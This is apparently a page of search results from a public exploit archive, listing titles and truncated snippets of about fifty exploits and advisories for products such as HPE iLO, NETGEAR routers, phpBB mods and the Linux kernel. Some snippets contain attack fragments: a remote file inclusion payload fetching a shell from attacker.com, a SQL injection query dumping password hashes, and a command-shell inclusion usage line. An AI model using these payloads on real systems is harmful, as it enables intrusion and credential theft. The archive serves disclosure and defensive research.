41207 matches found
HPE iLO 4 2.53 - Add New Administrator User
HPE iLO 4 2.53 - Add New Administrator User !/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP:...
NETGEAR Routers - Password Disclosure
NETGEAR Routers - Password Disclosure Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers Published: 01/30/2017 Version: 1.0 Vendor: NETGEAR http://www.netgear.com/ Product: Multiple products Finding 1: Remote and Local Password Disclosure Credit: Simo...
eGroupWare 1.8.006 - Multiple Vulnerabilities
eGroupWare 1.8.006 - Multiple Vulnerabilities Advisory ID: HTB23212 Product: EGroupware Vendor: http://www.egroupware.org/ Vulnerable Versions: 1.8.006 community edition and probably prior Tested Version: 1.8.006 community edition Advisory Publication: April 23, 2014 without technical details...
Linux Kernel - group_info refcounter Overflow Memory Corruption
Linux Kernel - groupinfo refcounter Overflow Memory Corruption / DoS poc for CVE-2014-2851 Linux groupinfo refcounter overflow memory corruption https://lkml.org/lkml/2014/4/10/736 @Tohmaxx - http://thomaspollet.blogspot.be If the app doesn't crash your system, try a different count argv1 Executi...
Tableau Server 8.0.7 8.1.2 - Blind SQL Injection
Tableau Server 8.0.7 8.1.2 - Blind SQL Injection Trustwave's SpiderLabs Security Advisory TWSL2014-003: Blind SQL Injection Vulnerability in Tableau Server Published: 02/07/14 Version: 1.1 Vendor: Tableau Software http://www.tableausoftware.com Product: Tableau Server Versions affected: 8.1.X...
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities waraxe-2012-SA096 - Multiple Vulnerabilities in Zenphoto 1.4.3.3 =============================================================================== Author: Janek Vind "waraxe" Date: 03. November 2012 Location: Estonia, Tartu Web:...
Sunbird 0.9 - Array Overrun Code Execution
Sunbird 0.9 - Array Overrun Code Execution full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253 Sunbird 0.9 Array Overrun code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-199 Risk:...
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR andresg888 Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Exploit : Go to the shoutbox and type: red text or hi or 3xplo!t : http://server/path/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? Greetz : 84kur10 , Brunos50 Speci...
EsFaq 2.0 - idcat SQL Injection
EsFaq 2.0 - idcat SQL Injection || | | EsFaq Remote Sql Injection Exploit | | |---------------------SuB-ZeRo----------------------| | | Author: SuB-ZeRo | | Home : www.dz-security.com | | email: [email protected] | | | | | | | script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript...
MVC-Web CMS 1.01.2 - newsid SQL Injection
MVC-Web CMS 1.01.2 - newsid SQL Injection Bl@ckbe@rD 'Tunisian TerrorisT' ------------------------- $$$$$$$$$$$$$$$$$$$$$$$---------------------------------------- + Script Name : MVC-Web CMS 1.0 and 1.2 Remote SQL Injection Exploit |+| Team : InjEct0r5 + Author : Bl@ckbe@rD 'Tunisian TerrorisT' ...
Linux Kernel 2.0.x2.2.x2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure
Linux Kernel 2.0.x2.2.x2.4.x FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure source: https://www.securityfocus.com/bid/6535/info Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. Frames that are small...
Categories hierarchy phpBB Mod 2.1.2 - phpbb_root_path Remote File Inclusion
Categories hierarchy phpBB Mod 2.1.2 - phpbbrootpath Remote File Inclusion C xoron Name: Categories hierarchy v2.1.2 phpbbrootpath Remote File Include Exploit Script name: Ptifo mod-CH212installed Author: xoron Exploit coded by xoron Download:...
Cyberfolio 2.0 RC1 - av Remote File Inclusion
Cyberfolio 2.0 RC1 - av Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV58$2006 ----------------------------------------------------------------------------------------------- ECHOADV58$2006Cyberfolio =2.0 RC1 $av Remote File Inclusion...
EZContents 2.0.3 - showlinks.php?GLOBALS[admin_home] Remote File Inclusion
EZContents 2.0.3 - showlinks.php?GLOBALSadminhome Remote File Inclusion source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these...
Invision Power Board 2.1 2.1.6 - SQL Injection (2)
Invision Power Board 2.1 2.1.6 - SQL Injection 2 !/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent-new; &header; if @ARGV ".$server."result.txt"; for$id = 1; $id = $kol; $id++ $ownquery = "UNION SELECT convergepasshash,1,1,1 FROM ".$prefix."membersconverge WHERE convergeid=".$id."/";...
PHP121 Instant Messenger 1.4 - Remote Code Execution
PHP121 Instant Messenger 1.4 - Remote Code Execution !/usr/bin/php -q -d shortopentag=on works with magicquotesgpc = Off\r\n\r\n"; echo "a dork: inurl:php121login.php | inurl:php121im.php | intitle:"PHP121 - PLEASE"\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host path cmd OPTIONS\r\n"; echo...
Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service
Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol ICMP are reported prone to several denial-of-service attacks. ICMP is employed by...
Microsoft Windows (x86) - Metafile .emf Heap Overflow (MS04-032)
Microsoft Windows x86 - Metafile .emf Heap Overflow MS04-032 / HOD-ms04032-emf-expl2.c: MS04-032 Microsoft Windows XP Metafile .emf Heap Overflow Exploit version 0.2 PUBLIC coded by .:: houseofdabus ::. at inbox dot ru ------------------------------------------------------------------- About...
Alfresco 5.2.4 - Persistent Cross-Site Scripting
Alfresco 5.2.4 - Persistent Cross-Site Scripting Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting Date: 2020-03-02 Exploit Author: Romain LOISEL & Alexandre ZANNI https://pwn.by/noraj - Pentesters from Orange Cyberdefense France Vendor Homepage: https://www.alfresco.com/ Software...
BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
BOOTP Turbo 2.0 - Denial of Service SEHPoC Exploit Title: BOOTP Turbo 2.0 - Denial of Service SEHPoC Exploit Author: boku Date: 2020-01-22 Software Vendor: Wierd Solutions Vendor Homepage: https://www.weird-solutions.com Software Link:...
GTalk Password Finder 2.2.1 - Key Denial of Service (PoC)
GTalk Password Finder 2.2.1 - Key Denial of Service PoC Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service PoC Exploit Author: Ismail Tasdelen Exploit Date: 2020-01-16 Vendor Homepage : http://www.nsauditor.com/ Link Software :...
TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)
TemaTres 3.0 - Cross-Site Request Forgery Add Admin Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery Add Admin Author: Pablo Santiago Date: 2019-11-14 Vendor Homepage: https://www.vocabularyserver.com/ Source:...
LibreOffice 6.2.6 Macro - Python Code Execution (Metasploit)
LibreOffice 6.2.6 Macro - Python Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LibreOffice Macro Python Code Execution', 'Description' = %q LibreOffice comes bundled...
Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR
Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR / A bug in IonMonkeys type inference system when JIT compiling and entering a constructor function via on-stack replacement OSR allows the compilation of JITed functions that cause type confusions between...
Nagios XI 5.5.6 - Remote Code Execution Privilege Escalation
Nagios XI 5.5.6 - Remote Code Execution Privilege Escalation Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation Date: 2019-01-22 Exploit Author: Chris Lyne @lynerc Vendor Homepage: https://www.nagios.com/ Product: Nagios XI Software Link:...
Nagios Core 4.4.1 - Denial of Service
Nagios Core 4.4.1 - Denial of Service Exploit Title: Nagios Core Multiple Local Denial of Service Date: 2018-07-09 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.nagios.org/ Software Link: https://www.nagios.org/downloads/nagios-core/ Version: 4.4.1 and earlier Tested on:...
MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting
MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting Exploit Title: MyBB ChangUonDyU Advanced Statistics Plugin v1.0.2 - Cross-Site Scripting Date: 5/25/2018 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=1125 Version: 1.0.2...
Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure
Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure -- coding: utf-8 -- Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump Vendor Notification: 03-03-2018 - No response Initial CVE: 04-04-2018 Disclosure: 21-04-2018 Exploit Author: Berk Cem Göksel Contact: twitter.com/berkcgoks...
Asterisk chan_pjsip 15.2.0 - SUBSCRIBE Stack Corruption
Asterisk chanpjsip 15.2.0 - SUBSCRIBE Stack Corruption ''' SUBSCRIBE message with a large Accept value causes stack corruption - Authors: - Alfred Farrugia - Sandro Gauci - Latest vulnerable version: Asterisk 15.2.0 running chanpjsip - Tested vulnerable versions: 15.2.0, 13.19.0, 14.7.5, 13.11.2 ...
System Shield 5.0.0.136 - Privilege Escalation
System Shield 5.0.0.136 - Privilege Escalation / Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation Date - 29th January 2018 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.iolo.com/ Tested Version - 5.0.0.136 Driver Version - 5.4.11.1 ...
Cisco IOS - Remote Code Execution
Cisco IOS - Remote Code Execution !/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco...
Check_MK 1.2.8p25 - Information Disclosure
CheckMK 1.2.8p25 - Information Disclosure 1. ADVISORY INFORMATION ======================= Product: Checkmk Vendor URL: https://mathias-kettner.de/checkmk.html Type: Race Condition CWE-362 Date found: 2017-09-21 Date published: 2017-10-18 CVSSv3 Score: 7.5...
Microsoft Windows - USP10!otlSinglePosLookup::getCoverageTable Uniscribe Font Processing Out-of-Bounds Memory Read
Microsoft Windows - USP10!otlSinglePosLookup::getCoverageTable Uniscribe Font Processing Out-of-Bounds Memory Read Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1203 We have encountered a crash in the Windows Uniscribe user-mode library, in the...
Axis Network Cameras - Multiple Vulnerabilities
Axis Network Cameras - Multiple Vulnerabilities | | | | | | | | | | | | / | '\ \ /\ / / \ | | |/ | ' / | 6079 Smith W | | | \ V V / / | | | | | | \ \ doubleplusungood /|| // ||||,|./|/ owning some telescreens... Security Adivisory 2016-04-09 www.orwelllabs.com twt:@orwelllabs I. ADVISORY...
Google Android - Stagefright Remote Code Execution
Google Android - Stagefright Remote Code Execution !/usr/bin/env python Joshua J. Drake @jduck of ZIMPERIUM zLabs Shout outs to our friends at Optiv formerly Accuvant Labs C Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 www.zimperium.com Exploit for RCE Vulnerability CVE-2015-153...
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service !/usr/bin/perl miniupnpd/1.0 remote denial of service exploit Copyright 2015 c Todor Donev [email protected] http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg The SSDP protocol can discover Plug & Play devices, with...
MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities
MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities Trustwave SpiderLabs Security Advisory TWSL2013-019: Multiple Vulnerabilities in MiCasaVerde VeraLite Published: 08/01/13 Version: 1.0 Vendor: MiCasaVerde http://www.micasaverde.com/ Product: VeraLite Version affected: 1.5.408 Product...
Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)
Microsoft DirectShow - Arbitrary Memory Overwrite MS13-056 Introduction: The Microsoft DirectShow application programming interface API is a media-streaming architecture for Microsoft Windows. Using DirectShow, your applications can perform high-quality video and audio playback or capture...
GIMP 2.8.0 - .FIT File Format Denial of Service
GIMP 2.8.0 - .FIT File Format Denial of Service Summary ======= There is a file handling DoS in GIMP the GNU Image Manipulation Program for the 'fit' file format affecting all versions Windows and Linux up to and including 2.8.0. A file in the fit format with a malformed 'XTENSION' header will...
GNU libcregcomp(3) - Multiple Vulnerabilities
GNU libcregcomp3 - Multiple Vulnerabilities // source: http://securityreason.com/securityalert/8003 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 GNU libc/regcomp3 Multiple Vulnerabilities Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 01.10.2010 - -...
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite // source: https://www.securityfocus.com/bid/44242/info / CVE-2010-2963 Arbitrary write memory write via v4l1 compat ioctl. Kees Cook greets to drosenberg, spender, taviso / define GNUSOURCE include include include include includ...
bwired - index.php?newsID SQL Injection
bwired - index.php?newsID SQL Injection / \ / \ | | | | | | | | | | | / | | | | | | | ' / | | ' \ / \ | | | | || | || | | | \ | | | | / | , |/ /|| ||| |||| / | |/ Program Title bwired - Remote SQL Injection Note There is also XSS, PHPSESSID session fixation, and cookie manipulation which I...
INDEXU 5.0.1 - base_path Remote File Inclusion
INDEXU 5.0.1 - basepath Remote File Inclusion !/usr/bin/perl INDEXU perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd;...
AOL Instant Messenger AIM - Away Message Local Overflow
AOL Instant Messenger AIM - Away Message Local Overflow / subject: local PoC exploit for AIM 5.5.3595 vendor: http://www.aim.com cve: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636 credits: Matt Murphy date: 10 August 2004 notes: exploits localy if an argument is supplied,...
Microsoft IIS 5.0 - WebDAV Remote
Microsoft IIS 5.0 - WebDAV Remote // / IIS 5.0 WebDAV -Proof of concept- / / Bug: CAN-2003-0109 / / By Roman Medina-Heigl Hernandez / / aka RoMaNSoFt / / Madrid, 23.Mar.2003 / / ================================= / / Public release. Version 1. / / --------------------------------- / // /...
DCP-Portal 5.0.1 - lib.php?Root Remote File Inclusion
DCP-Portal 5.0.1 - lib.php?Root Remote File Inclusion source: https://www.securityfocus.com/bid/6525/info DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. An attacker may exploit this by supplying a path to a maliciously create...
EyesOfNetwork 5.3 - Remote Code Execution
EyesOfNetwork 5.3 - Remote Code Execution Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution Date: 2020-02-01 Exploit Author: Clément Billac Vendor Homepage: https://www.eyesofnetwork.com/ Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x8664-bin.iso Version: 5.3 CVE :...
AnchorCMS 0.12.3a - Information Disclosure
AnchorCMS 0.12.3a - Information Disclosure Exploit Title: Information disclosure MySQL password in error log Date: 2/10/2019 Exploit Author: Tijme Gommers https://twitter.com/finnwea/ Vendor Homepage: https://anchorcms.com/ Software Link: https://github.com/anchorcms/anchor-cms/releases Version:...
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation SystemCollector PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service Affected Products Windows 10 Windows Server Windows Server 2016 Visual Studio 2015 Update 3 Visual Studio 20...
DotNetNuke DNNarticle Module 11 - Directory Traversal
DotNetNuke DNNarticle Module 11 - Directory Traversal 01. Advisory Information Title: Directory Traversal Vulnerability in DNNarticle module Date published: n/a Date of last update: n/a Vendors contacted: zldnn.com Discovered by: Esmaeil Rahimian Severity: Critical 02. Vulnerability Information...